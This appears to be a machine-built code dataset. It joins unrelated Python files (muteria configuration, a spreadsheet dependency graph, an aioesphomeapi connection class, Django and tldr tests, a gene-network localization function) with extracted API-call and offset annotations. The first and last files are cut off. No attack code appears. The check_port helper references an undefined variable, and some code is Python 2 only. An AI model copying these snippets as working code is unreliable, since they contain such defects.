c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp.append(c)
conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM = tmp
tmp = {}
for c, sel_tech in conf.CRITERIA_ELEM_SELECTIONS.items():
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in crit elem selection: "+c, \
__file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp[c] = sel_tech
conf.CRITERIA_ELEM_SELECTIONS = tmp
tmp = []
for tc in conf.TESTCASE_TOOLS_CONFIGS:
if not isinstance(tc, configurations.TestcaseToolsConfig):
tc = cls._make_tool_conf_from_raw(tc, \
testgeneration.TestToolType,\
testgeneration.TEST_TOOL_TYPES_SCHEDULING[0][0],\
configurations.TestcaseToolsConfig)
tmp.append(tc)
conf.TESTCASE_TOOLS_CONFIGS = tmp
tmp = {}
for crit, cc_list in list(\
conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA.items()):
for cc in cc_list:
if not isinstance(cc, configurations.CriteriaToolsConfig):
cc = cls._make_tool_conf_from_raw(cc, \
criteria.CriteriaToolType,\
criteria.CRITERIA_TOOL_TYPES_SCHEDULING[0][0],\
configurations.CriteriaToolsConfig)
# TODO: Criteria enabled verification
if crit not in tmp:
tmp[crit] = []
tmp[crit].append(cc)
conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA = tmp
# criteria Optimizer
tmp = {}
for c, opt in conf.CRITERIA_EXECUTION_OPTIMIZERS.items():
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in opt: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
# use base criteria opt to give option to set one own optimizer
# in conf
if not isinstance(opt, crit_opt_module.CriteriaOptimizers) and \
not isinstance(opt, BaseCriteriaTestExecutionOptimizer):
ERROR_HANDLER.assert_true(crit_opt_module.CriteriaOptimizers.\
has_element_named(opt), \
"Invalid criterion Optimizer: "+opt)
opt = crit_opt_module.CriteriaOptimizers[opt]
ERROR_HANDLER.assert_true(\
crit_opt_module.check_is_right_optimizer(c, opt), \
"Wrong optimizer for test criterion")
tmp[c] = opt
# Make sure that all criteria have optimizers
for c in conf.ENABLED_CRITERIA:
if c not in tmp:
tmp[c] = crit_opt_module.CriteriaOptimizers.NO_OPTIMIZATION
conf.CRITERIA_EXECUTION_OPTIMIZERS = tmp
tmp = []
for ct in conf.RE_EXECUTE_FROM_CHECKPOINT_META_TASKS:
if not isinstance(ct, checkpoint_tasks.Tasks):
ERROR_HANDLER.assert_true(\
checkpoint_tasks.Tasks.has_element_named(ct), \
"invalid checkpoint task: "+ct)
ct = checkpoint_tasks.Tasks[ct]
tmp.append(ct)
conf.RE_EXECUTE_FROM_CHECKPOINT_META_TASKS = tmp
# NEXT here
#TODO: Add optimizers ....
# make configelement for each
for k in raw_conf:
setattr(conf, k, ConfigElement(val=getattr(conf, k)))
return conf
#~ def get_finalconf_of_rawconf()
#~ class ConfigurationHelper()
|
[
"sys.path.pop",
"copy.deepcopy",
"os.path.abspath",
"muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.CriteriaOptimizers.has_element_named",
"importlib.import_module",
"muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.check_is_right_optimizer",
"sys.path.insert",
"muteria.drivers.criteria.TestCriteria.has_element_named",
"muteria.controller.checkpoint_tasks.Tasks.has_element_named",
"muteria.configmanager.configurations.ToolUserCustom",
"muteria.configmanager.configurations.CompleteConfiguration"
] |
[((6524, 6547), 'muteria.configmanager.configurations.CompleteConfiguration', 'CompleteConfiguration', ([], {}), '()\n', (6545, 6547), False, 'from muteria.configmanager.configurations import CompleteConfiguration\n'), ((3969, 4004), 'importlib.import_module', 'importlib.import_module', (['module_str'], {}), '(module_str)\n', (3992, 4004), False, 'import importlib\n'), ((4925, 4949), 'sys.path.insert', 'sys.path.insert', (['(0)', 'path'], {}), '(0, path)\n', (4940, 4949), False, 'import sys\n'), ((5478, 5493), 'sys.path.pop', 'sys.path.pop', (['(0)'], {}), '(0)\n', (5490, 5493), False, 'import sys\n'), ((10117, 10171), 'copy.deepcopy', 'copy.deepcopy', (['conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA'], {}), '(conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA)\n', (10130, 10171), False, 'import copy\n'), ((11168, 11209), 'copy.deepcopy', 'copy.deepcopy', (['criteria.CRITERIA_SEQUENCE'], {}), '(criteria.CRITERIA_SEQUENCE)\n', (11181, 11209), False, 'import copy\n'), ((11926, 11989), 'copy.deepcopy', 'copy.deepcopy', (['criteria.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM'], {}), '(criteria.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM)\n', (11939, 11989), False, 'import copy\n'), ((4859, 4893), 'os.path.abspath', 'os.path.abspath', (['raw_conf_filename'], {}), '(raw_conf_filename)\n', (4874, 4893), False, 'import os\n'), ((8600, 8651), 'muteria.configmanager.configurations.ToolUserCustom', 'configurations.ToolUserCustom', ([], {}), '(**raw_dict_conf[tuc])\n', (8629, 8651), True, 'import muteria.configmanager.configurations as configurations\n'), ((15435, 15483), 'muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.check_is_right_optimizer', 'crit_opt_module.check_is_right_optimizer', (['c', 'opt'], {}), '(c, opt)\n', (15475, 15483), True, 'import muteria.drivers.optimizers.criteriatestexecution.optimizerdefs as crit_opt_module\n'), ((10358, 10400), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (10397, 10400), True, 'import muteria.drivers.criteria as criteria\n'), ((10769, 10811), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (10808, 10811), True, 'import muteria.drivers.criteria as criteria\n'), ((12229, 12271), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (12268, 12271), True, 'import muteria.drivers.criteria as criteria\n'), ((12778, 12820), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (12817, 12820), True, 'import muteria.drivers.criteria as criteria\n'), ((14578, 14620), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (14617, 14620), True, 'import muteria.drivers.criteria as criteria\n'), ((15112, 15169), 'muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.CriteriaOptimizers.has_element_named', 'crit_opt_module.CriteriaOptimizers.has_element_named', (['opt'], {}), '(opt)\n', (15164, 15169), True, 'import muteria.drivers.optimizers.criteriatestexecution.optimizerdefs as crit_opt_module\n'), ((16050, 16094), 'muteria.controller.checkpoint_tasks.Tasks.has_element_named', 'checkpoint_tasks.Tasks.has_element_named', (['ct'], {}), '(ct)\n', (16090, 16094), True, 'import muteria.controller.checkpoint_tasks as checkpoint_tasks\n'), ((11464, 11506), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (11503, 11506), True, 'import muteria.drivers.criteria as criteria\n')]
|
# Copyright (c) 2010 Resolver Systems Ltd, PythonAnywhere LLP
# See LICENSE.md
#
from threading import Lock
from .errors import report_cell_error, CycleError
class Node(object):
def __init__(self, location, children=None, parents=None):
self.location = location
self.children = children if children else set()
self.parents = parents if parents else set()
self.lock = Lock()
def __eq__(self, other):
return (
self.location == other.location and
self.children == other.children and
self.parents == other.parents
)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "<Node %d,%d children={%s} parents={%s}>" % (
self.location[0], self.location[1],
', '.join(str(i) for i in self.children),
', '.join(str(i) for i in self.parents))
def remove_from_parents(self, parent_nodes, leaf_queue):
for parent in parent_nodes:
parent.lock.acquire()
parent.children.remove(self.location)
if len(parent.children) == 0:
leaf_queue.put(parent.location)
parent.lock.release()
def build_dependency_graph(worksheet):
graph = {}
visited = set()
for loc in worksheet.keys():
try:
_generate_cell_subgraph(worksheet, graph, loc, visited, [])
except CycleError:
pass # Deal with escapees
leaves = []
for loc, deps in graph.iteritems():
if not deps.children:
leaves.append(loc)
return graph, leaves
def _generate_cell_subgraph(worksheet, graph, loc, completed, path):
if loc not in worksheet:
return
cell = worksheet[loc]
if loc in completed:
if type(cell.error) == CycleError:
raise cell.error
else:
return
if loc in path:
cycle_error = CycleError(path[path.index(loc):] + [loc])
report_cell_error(worksheet, loc, cycle_error)
completed.add(loc)
raise cycle_error
if cell.python_formula:
valid_dependencies = set()
for dep_loc in cell.dependencies:
dep_cell = worksheet[dep_loc]
try:
_generate_cell_subgraph(worksheet, graph, dep_loc, completed, path + [loc])
if dep_cell.error:
continue
if not dep_cell.python_formula:
continue
valid_dependencies.add(dep_loc)
except CycleError as cycle_error:
if not loc in completed:
report_cell_error(worksheet, loc, cycle_error)
if loc in cycle_error.path:
completed.add(loc)
raise cycle_error
_add_location_dependencies(graph, loc, valid_dependencies)
completed.add(loc)
def _add_location_dependencies(graph, location, dependencies):
if location not in graph:
graph[location] = Node(location)
graph[location].children |= dependencies
for dependency in dependencies:
if dependency not in graph:
graph[dependency] = Node(dependency)
graph[dependency].parents.add(location)
|
[
"threading.Lock"
] |
[((407, 413), 'threading.Lock', 'Lock', ([], {}), '()\n', (411, 413), False, 'from threading import Lock\n')]
|
import requests
def getrev():
resp = requests.get("https://pypi.org/pypi/TwitchIO/json")
data = resp.json()["releases"]
pre = max(data).split("b")
final = f"{pre[0]}b{int(pre[1]) + 1}"
return final
print(getrev())
|
[
"requests.get"
] |
[((43, 94), 'requests.get', 'requests.get', (['"""https://pypi.org/pypi/TwitchIO/json"""'], {}), "('https://pypi.org/pypi/TwitchIO/json')\n", (55, 94), False, 'import requests\n')]
|
import asyncio
import logging
import socket
import time
from dataclasses import astuple, dataclass
from typing import Any, Awaitable, Callable, List, Optional, cast
from google.protobuf import message
import aioesphomeapi.host_resolver as hr
from .api_pb2 import ( # type: ignore
ConnectRequest,
ConnectResponse,
DisconnectRequest,
DisconnectResponse,
GetTimeRequest,
GetTimeResponse,
HelloRequest,
HelloResponse,
PingRequest,
PingResponse,
)
from .core import MESSAGE_TYPE_TO_PROTO, APIConnectionError
from .model import APIVersion
from .util import bytes_to_varuint, varuint_to_bytes
_LOGGER = logging.getLogger(__name__)
@dataclass
class ConnectionParams:
eventloop: asyncio.events.AbstractEventLoop
address: str
port: int
password: Optional[str]
client_info: str
keepalive: float
zeroconf_instance: hr.ZeroconfInstanceType
class APIConnection:
def __init__(
self, params: ConnectionParams, on_stop: Callable[[], Awaitable[None]]
):
self._params = params
self.on_stop = on_stop
self._stopped = False
self._socket: Optional[socket.socket] = None
self._socket_reader: Optional[asyncio.StreamReader] = None
self._socket_writer: Optional[asyncio.StreamWriter] = None
self._write_lock = asyncio.Lock()
self._connected = False
self._authenticated = False
self._socket_connected = False
self._state_lock = asyncio.Lock()
self._api_version: Optional[APIVersion] = None
self._message_handlers: List[Callable[[message.Message], None]] = []
self.log_name = params.address
def _start_ping(self) -> None:
async def func() -> None:
while self._connected:
await asyncio.sleep(self._params.keepalive)
if not self._connected:
return
try:
await self.ping()
except APIConnectionError:
_LOGGER.info("%s: Ping Failed!", self.log_name)
await self._on_error()
return
self._params.eventloop.create_task(func())
async def _close_socket(self) -> None:
if not self._socket_connected:
return
async with self._write_lock:
if self._socket_writer is not None:
self._socket_writer.close()
self._socket_writer = None
self._socket_reader = None
if self._socket is not None:
self._socket.close()
self._socket_connected = False
self._connected = False
self._authenticated = False
_LOGGER.debug("%s: Closed socket", self.log_name)
async def stop(self, force: bool = False) -> None:
if self._stopped:
return
if self._connected and not force:
try:
await self._disconnect()
except APIConnectionError:
pass
self._stopped = True
await self._close_socket()
await self.on_stop()
async def _on_error(self) -> None:
await self.stop(force=True)
async def connect(self) -> None:
if self._stopped:
raise APIConnectionError(f"Connection is closed for {self.log_name}!")
if self._connected:
raise APIConnectionError(f"Already connected for {self.log_name}!")
try:
coro = hr.async_resolve_host(
self._params.eventloop,
self._params.address,
self._params.port,
self._params.zeroconf_instance,
)
addr = await asyncio.wait_for(coro, 30.0)
except APIConnectionError as err:
await self._on_error()
raise err
except asyncio.TimeoutError:
await self._on_error()
raise APIConnectionError(
f"Timeout while resolving IP address for {self.log_name}"
)
self._socket = socket.socket(
family=addr.family, type=addr.type, proto=addr.proto
)
self._socket.setblocking(False)
self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
_LOGGER.debug(
"%s: Connecting to %s:%s (%s)",
self.log_name,
self._params.address,
self._params.port,
addr,
)
sockaddr = astuple(addr.sockaddr)
try:
coro2 = self._params.eventloop.sock_connect(self._socket, sockaddr)
await asyncio.wait_for(coro2, 30.0)
except OSError as err:
await self._on_error()
raise APIConnectionError(f"Error connecting to {sockaddr}: {err}")
except asyncio.TimeoutError:
await self._on_error()
raise APIConnectionError(f"Timeout while connecting to {sockaddr}")
_LOGGER.debug("%s: Opened socket for", self._params.address)
self._socket_reader, self._socket_writer = await asyncio.open_connection(
sock=self._socket
)
self._socket_connected = True
self._params.eventloop.create_task(self.run_forever())
hello = HelloRequest()
hello.client_info = self._params.client_info
try:
resp = await self.send_message_await_response(hello, HelloResponse)
except APIConnectionError as err:
await self._on_error()
raise err
_LOGGER.debug(
"%s: Successfully connected ('%s' API=%s.%s)",
self.log_name,
resp.server_info,
resp.api_version_major,
resp.api_version_minor,
)
self._api_version = APIVersion(resp.api_version_major, resp.api_version_minor)
if self._api_version.major > 2:
_LOGGER.error(
"%s: Incompatible version %s! Closing connection",
self.log_name,
self._api_version.major,
)
await self._on_error()
raise APIConnectionError("Incompatible API version.")
self._connected = True
self._start_ping()
async def login(self) -> None:
self._check_connected()
if self._authenticated:
raise APIConnectionError("Already logged in!")
connect = ConnectRequest()
if self._params.password is not None:
connect.password = self._params.password
resp = await self.send_message_await_response(connect, ConnectResponse)
if resp.invalid_password:
raise APIConnectionError("Invalid password!")
self._authenticated = True
def _check_connected(self) -> None:
if not self._connected:
raise APIConnectionError("Must be connected!")
@property
def is_connected(self) -> bool:
return self._connected
@property
def is_authenticated(self) -> bool:
return self._authenticated
async def _write(self, data: bytes) -> None:
# _LOGGER.debug("%s: Write: %s", self._params.address,
# ' '.join('{:02X}'.format(x) for x in data))
if not self._socket_connected:
raise APIConnectionError("Socket is not connected")
try:
async with self._write_lock:
if self._socket_writer is not None:
self._socket_writer.write(data)
await self._socket_writer.drain()
except OSError as err:
await self._on_error()
raise APIConnectionError("Error while writing data: {}".format(err))
async def send_message(self, msg: message.Message) -> None:
for message_type, klass in MESSAGE_TYPE_TO_PROTO.items():
if isinstance(msg, klass):
break
else:
raise ValueError
encoded = msg.SerializeToString()
_LOGGER.debug("%s: Sending %s: %s", self._params.address, type(msg), str(msg))
req = bytes([0])
req += varuint_to_bytes(len(encoded))
# pylint: disable=undefined-loop-variable
req += varuint_to_bytes(message_type)
req += encoded
await self._write(req)
async def send_message_callback_response(
self, send_msg: message.Message, on_message: Callable[[Any], None]
) -> None:
self._message_handlers.append(on_message)
await self.send_message(send_msg)
async def send_message_await_response_complex(
self,
send_msg: message.Message,
do_append: Callable[[Any], bool],
do_stop: Callable[[Any], bool],
timeout: float = 5.0,
) -> List[Any]:
fut = self._params.eventloop.create_future()
responses = []
def on_message(resp: message.Message) -> None:
if fut.done():
return
if do_append(resp):
responses.append(resp)
if do_stop(resp):
fut.set_result(responses)
self._message_handlers.append(on_message)
await self.send_message(send_msg)
try:
await asyncio.wait_for(fut, timeout)
except asyncio.TimeoutError:
if self._stopped:
raise APIConnectionError("Disconnected while waiting for API response!")
raise APIConnectionError("Timeout while waiting for API response!")
try:
self._message_handlers.remove(on_message)
except ValueError:
pass
return responses
async def send_message_await_response(
self, send_msg: message.Message, response_type: Any, timeout: float = 5.0
) -> Any:
def is_response(msg: message.Message) -> bool:
return isinstance(msg, response_type)
res = await self.send_message_await_response_complex(
send_msg, is_response, is_response, timeout=timeout
)
if len(res) != 1:
raise APIConnectionError("Expected one result, got {}".format(len(res)))
return res[0]
async def _recv(self, amount: int) -> bytes:
if amount == 0:
return bytes()
try:
assert self._socket_reader is not None
ret = await self._socket_reader.readexactly(amount)
except (asyncio.IncompleteReadError, OSError, TimeoutError) as err:
raise APIConnectionError("Error while receiving data: {}".format(err))
return ret
async def _recv_varint(self) -> int:
raw = bytes()
while not raw or raw[-1] & 0x80:
raw += await self._recv(1)
return cast(int, bytes_to_varuint(raw))
async def _run_once(self) -> None:
preamble = await self._recv(1)
if preamble[0] != 0x00:
raise APIConnectionError("Invalid preamble")
length = await self._recv_varint()
msg_type = await self._recv_varint()
raw_msg = await self._recv(length)
if msg_type not in MESSAGE_TYPE_TO_PROTO:
_LOGGER.debug(
"%s: Skipping message type %s", self._params.address, msg_type
)
return
msg = MESSAGE_TYPE_TO_PROTO[msg_type]()
try:
msg.ParseFromString(raw_msg)
except Exception as e:
raise APIConnectionError("Invalid protobuf message: {}".format(e))
_LOGGER.debug(
"%s: Got message of type %s: %s", self._params.address, type(msg), msg
)
for msg_handler in self._message_handlers[:]:
msg_handler(msg)
await self._handle_internal_messages(msg)
async def run_forever(self) -> None:
while True:
try:
await self._run_once()
except APIConnectionError as err:
_LOGGER.info(
"%s: Error while reading incoming messages: %s",
self.log_name,
err,
)
await self._on_error()
break
except Exception as err: # pylint: disable=broad-except
_LOGGER.info(
"%s: Unexpected error while reading incoming messages: %s",
self.log_name,
err,
)
await self._on_error()
break
async def _handle_internal_messages(self, msg: Any) -> None:
if isinstance(msg, DisconnectRequest):
await self.send_message(DisconnectResponse())
await self.stop(force=True)
elif isinstance(msg, PingRequest):
await self.send_message(PingResponse())
elif isinstance(msg, GetTimeRequest):
resp = GetTimeResponse()
resp.epoch_seconds = int(time.time())
await self.send_message(resp)
async def ping(self) -> None:
self._check_connected()
await self.send_message_await_response(PingRequest(), PingResponse)
async def _disconnect(self) -> None:
self._check_connected()
try:
await self.send_message_await_response(
DisconnectRequest(), DisconnectResponse
)
except APIConnectionError:
pass
def _check_authenticated(self) -> None:
if not self._authenticated:
raise APIConnectionError("Must login first!")
@property
def api_version(self) -> Optional[APIVersion]:
return self._api_version
|
[
"asyncio.sleep",
"aioesphomeapi.host_resolver.async_resolve_host",
"asyncio.open_connection",
"socket.socket",
"time.time",
"asyncio.Lock",
"asyncio.wait_for",
"dataclasses.astuple",
"logging.getLogger"
] |
[((641, 668), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (658, 668), False, 'import logging\n'), ((1334, 1348), 'asyncio.Lock', 'asyncio.Lock', ([], {}), '()\n', (1346, 1348), False, 'import asyncio\n'), ((1483, 1497), 'asyncio.Lock', 'asyncio.Lock', ([], {}), '()\n', (1495, 1497), False, 'import asyncio\n'), ((4031, 4098), 'socket.socket', 'socket.socket', ([], {'family': 'addr.family', 'type': 'addr.type', 'proto': 'addr.proto'}), '(family=addr.family, type=addr.type, proto=addr.proto)\n', (4044, 4098), False, 'import socket\n'), ((4443, 4465), 'dataclasses.astuple', 'astuple', (['addr.sockaddr'], {}), '(addr.sockaddr)\n', (4450, 4465), False, 'from dataclasses import astuple, dataclass\n'), ((3458, 3581), 'aioesphomeapi.host_resolver.async_resolve_host', 'hr.async_resolve_host', (['self._params.eventloop', 'self._params.address', 'self._params.port', 'self._params.zeroconf_instance'], {}), '(self._params.eventloop, self._params.address, self.\n _params.port, self._params.zeroconf_instance)\n', (3479, 3581), True, 'import aioesphomeapi.host_resolver as hr\n'), ((5031, 5073), 'asyncio.open_connection', 'asyncio.open_connection', ([], {'sock': 'self._socket'}), '(sock=self._socket)\n', (5054, 5073), False, 'import asyncio\n'), ((3681, 3709), 'asyncio.wait_for', 'asyncio.wait_for', (['coro', '(30.0)'], {}), '(coro, 30.0)\n', (3697, 3709), False, 'import asyncio\n'), ((4577, 4606), 'asyncio.wait_for', 'asyncio.wait_for', (['coro2', '(30.0)'], {}), '(coro2, 30.0)\n', (4593, 4606), False, 'import asyncio\n'), ((9109, 9139), 'asyncio.wait_for', 'asyncio.wait_for', (['fut', 'timeout'], {}), '(fut, timeout)\n', (9125, 9139), False, 'import asyncio\n'), ((1797, 1834), 'asyncio.sleep', 'asyncio.sleep', (['self._params.keepalive'], {}), '(self._params.keepalive)\n', (1810, 1834), False, 'import asyncio\n'), ((12729, 12740), 'time.time', 'time.time', ([], {}), '()\n', (12738, 12740), False, 'import time\n')]
|
import time
import argparse
def check_positive_number(number):
return number > 0
def check_port(port, base=1024):
ivalue = int(port)
if ivalue <= base:
raise argparse.ArgumentTypeError("%s is an invalid positive int value" % value)
return ivalue
def work(seconds):
time.sleep(seconds)
|
[
"argparse.ArgumentTypeError",
"time.sleep"
] |
[((299, 318), 'time.sleep', 'time.sleep', (['seconds'], {}), '(seconds)\n', (309, 318), False, 'import time\n'), ((182, 255), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('%s is an invalid positive int value' % value)"], {}), "('%s is an invalid positive int value' % value)\n", (208, 255), False, 'import argparse\n')]
|
from django import test
from django.urls import reverse
from django.contrib import auth
from .. import models
class HermesTestCase(test.TestCase):
fixtures = ('hermes', )
def setUp(self):
self.root_category = models.Category.objects.get(id=1)
self.second_category = models.Category.objects.get(id=2)
self.third_category = models.Category.objects.get(id=3)
self.another_category = models.Category.objects.get(id=4)
self.post1 = models.Post.objects.get(id=1)
self.post2 = models.Post.objects.get(id=2)
self.post3 = models.Post.objects.get(id=3)
self.post4 = models.Post.objects.get(id=4)
self.user = auth.models.User.objects.get(id=1)
self.client = test.Client()
def url(self, url_name, *args, **kwargs):
return reverse(url_name, args=args, kwargs=kwargs)
def get(self, url):
return self.client.get(url)
|
[
"django.urls.reverse",
"django.contrib.auth.models.User.objects.get",
"django.test.Client"
] |
[((685, 719), 'django.contrib.auth.models.User.objects.get', 'auth.models.User.objects.get', ([], {'id': '(1)'}), '(id=1)\n', (713, 719), False, 'from django.contrib import auth\n'), ((743, 756), 'django.test.Client', 'test.Client', ([], {}), '()\n', (754, 756), False, 'from django import test\n'), ((819, 862), 'django.urls.reverse', 'reverse', (['url_name'], {'args': 'args', 'kwargs': 'kwargs'}), '(url_name, args=args, kwargs=kwargs)\n', (826, 862), False, 'from django.urls import reverse\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
from os import path
import shutil
from basic import BasicTestCase
class TestReindex(BasicTestCase):
def setUp(self):
super(TestReindex, self).setUp()
# Add a new page.
self.page_path = path.join(self.repo_dir, 'pages')
self.new_page = path.join(self.page_path, 'linux', 'blabla.md')
shutil.copy(path.join(self.page_path, 'linux', 'tcpflow.md'),
self.new_page)
# Backup the index.json.
shutil.copy(path.join(self.page_path, 'index.json'),
path.join(self.page_path, 'index_bak.json'))
def tearDown(self):
super(TestReindex, self).tearDown()
if path.exists(self.new_page):
os.remove(self.new_page)
# Restore the index.json.
if path.exists(path.join(self.page_path, 'index_bak.json')):
shutil.move(path.join(self.page_path, 'index_bak.json'),
path.join(self.page_path, 'index.json'))
def test_reindex(self):
before_reindex = self.call_find_command('blabla', platform='')
assert 'Sorry' in before_reindex.output
self.call_reindex_command()
after_reindex = self.call_find_command('blabla', platform='')
assert 'tcpflow' in after_reindex.output
|
[
"os.remove",
"os.path.join",
"os.path.exists"
] |
[((314, 347), 'os.path.join', 'path.join', (['self.repo_dir', '"""pages"""'], {}), "(self.repo_dir, 'pages')\n", (323, 347), False, 'from os import path\n'), ((372, 419), 'os.path.join', 'path.join', (['self.page_path', '"""linux"""', '"""blabla.md"""'], {}), "(self.page_path, 'linux', 'blabla.md')\n", (381, 419), False, 'from os import path\n'), ((765, 791), 'os.path.exists', 'path.exists', (['self.new_page'], {}), '(self.new_page)\n', (776, 791), False, 'from os import path\n'), ((440, 488), 'os.path.join', 'path.join', (['self.page_path', '"""linux"""', '"""tcpflow.md"""'], {}), "(self.page_path, 'linux', 'tcpflow.md')\n", (449, 488), False, 'from os import path\n'), ((579, 618), 'os.path.join', 'path.join', (['self.page_path', '"""index.json"""'], {}), "(self.page_path, 'index.json')\n", (588, 618), False, 'from os import path\n'), ((640, 683), 'os.path.join', 'path.join', (['self.page_path', '"""index_bak.json"""'], {}), "(self.page_path, 'index_bak.json')\n", (649, 683), False, 'from os import path\n'), ((805, 829), 'os.remove', 'os.remove', (['self.new_page'], {}), '(self.new_page)\n', (814, 829), False, 'import os\n'), ((887, 930), 'os.path.join', 'path.join', (['self.page_path', '"""index_bak.json"""'], {}), "(self.page_path, 'index_bak.json')\n", (896, 930), False, 'from os import path\n'), ((957, 1000), 'os.path.join', 'path.join', (['self.page_path', '"""index_bak.json"""'], {}), "(self.page_path, 'index_bak.json')\n", (966, 1000), False, 'from os import path\n'), ((1026, 1065), 'os.path.join', 'path.join', (['self.page_path', '"""index.json"""'], {}), "(self.page_path, 'index.json')\n", (1035, 1065), False, 'from os import path\n')]
|
from tabulate import tabulate
from methods.JSON import *
from methods.CSV import *
from methods.API import load_rand
def main():
print("welcome to the employee directory!")
start()
def start():
print("\nWelcome! choose one of the following commands: \n1: read CSV \n2: write to CSV \n3: read JSON\n4: write to JSON\n5: exit")
input1 = int(input("write command here: "))
if input1 == 1:
data = read_csv()
print(data)
start()
elif input1 == 2:
entry: str= ""
name=input("write employee name: ")
age=input("write employee's age: ")
dept=input("write employee's department: ")
entry = name + ", " + age + ", " + dept + "\n"
append_csv(entry)
start()
elif input1 == 3:
read_json()
start()
elif input1 == 4:
response = load_rand()
print(response)
write_json(response)
start()
elif input1 == 5:
exit()
else:
print("please enter a valid command")
start()
main()
|
[
"methods.API.load_rand"
] |
[((858, 869), 'methods.API.load_rand', 'load_rand', ([], {}), '()\n', (867, 869), False, 'from methods.API import load_rand\n')]
|
"""
-------------------------------------------
Author: <NAME>
Date: 7/3/19
-------------------------------------------
"""
# common packages, most likely already installed
import scipy
import math
import pandas as pd
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats
import sys
from scipy.special import ndtr
# uncommon packages required for this analysis
import seaborn as sns # pip install seaborn
# -------------------- LOCALIZATION ---------------------------------#
def localization(Gint, focal_genes, num_reps = 10, sample_frac = 0.8, method = 'numedges', plot = True, print_counter = False,
background_list=None):
"""
Function to calculate localization of an input set of genes (focal_genes) on a background network (Gint).
Option to compute number of edges (method = 'numedges') or largest connected component (method = 'LLC')
localization analysis. Calculates by sampling sub-sections of the focal genes/random set. Percentage to sample
is set by sample_frac. Option to plot the distributions of random and focal gene localizaiton.
Args:
Gint: Networkx Graph, background network to randomly sample from
focal_genes: List, set of genes to calculate localization of
num_reps: Int, number of times to randomly sample
sample_frac: Float, percent of sampled genes
method: String, to decide which type of localization analysis to run. Options: 'numedges', 'LLC', or 'both'.
plot: Bool, whether to plot the distributions in the output jupyter notebook cell
print_counter: Bool, whether to print a counter that tells you which iteration you are on (every 25 iterations).
Useful when the num_reps is very high.
background_list: list of background genes to sample from. If none, jsut use all interactome genes
Returns:
numedges_list: List, the number of edges calculated for each rep, sampling over focal genes.
Empty if method = 'LLC'.
numedges_rand: List, the number of edges calculated for each rep, sampling over random genes of
similar degree in the background network. Empty if method = 'LLC'.
LCC_list: List, the size of the largest connected component, calculated for each rep, sampling over focal genes.
Empty if method = 'numedges'.
LCC_rand: List, the size of the largest connected component, calculated for each rep, sampling over random genes of
similar degree in the background network. Empty if method = 'numedges'.
"""
# Create degree bins to sample from
bins = get_degree_binning(Gint, 10)
min_degree, max_degree, genes_binned = zip(*bins)
bin_df = pd.DataFrame({'min_degree':min_degree, 'max_degree':max_degree, 'genes_binned':genes_binned})
# create a lookup table for degree and index
actual_degree_to_bin_df_idx = {}
for i in range(0, bin_df['max_degree'].max() + 1):
idx_temp = bin_df[ (bin_df['min_degree'].lt(i + 1)) & (bin_df['max_degree'].gt(i - 1)) ].index.tolist()
if len(idx_temp) > 0: # there are some degrees which aren't represented in the graph
actual_degree_to_bin_df_idx[i] = idx_temp[0]
focal_genes = list(np.intersect1d(focal_genes, Gint.nodes())) # only use focal_genes which are in Gint
numedges_list = []
numedges_rand = []
LCC_list = []
LCC_rand = []
if background_list==None:
background_list=Gint.nodes()
for r in range(num_reps):
if print_counter == True:
# so user knows how far along the process is
if (r % 25) == 0:
print(r)
focal_80 = focal_genes
np.random.shuffle(focal_80)
focal_80 = focal_80[:int(len(focal_80)*sample_frac)]
# find genes with similar degrees to focal gene degree
seed_random = []
for g in focal_80:
degree_temp = nx.degree(Gint,g)
genes_temp = bin_df.loc[actual_degree_to_bin_df_idx[degree_temp]]['genes_binned'] # use the lookup table for speed
np.random.shuffle(genes_temp) # shuffle them
while (genes_temp[0] in seed_random) or (genes_temp[0] not in background_list): # make sure the gene isn't already in the list, but is in the background_list
np.random.shuffle(genes_temp) # shuffle them
seed_random.append(genes_temp[0]) # build the seed_D1_random list
#print(len(focal_80))
#print(len(seed_random))
#print(len(np.unique(seed_random)))
if (method == 'numedges') or (method == 'both'):
# number edges calc on focal set
numedges_temp = len(nx.subgraph(Gint,focal_80).edges())
numedges_list.append(numedges_temp)
# number edges calc on random sample
numedges_temp_rand = len(nx.subgraph(Gint,seed_random).edges())
numedges_rand.append(numedges_temp_rand)
if (method == 'LCC') or (method == 'both'):
# LLC calc on focal set
G_sub_temp = nx.Graph(nx.subgraph(Gint, focal_80))
G_sub_temp = max(nx.connected_component_subgraphs(G_sub_temp), key = len)
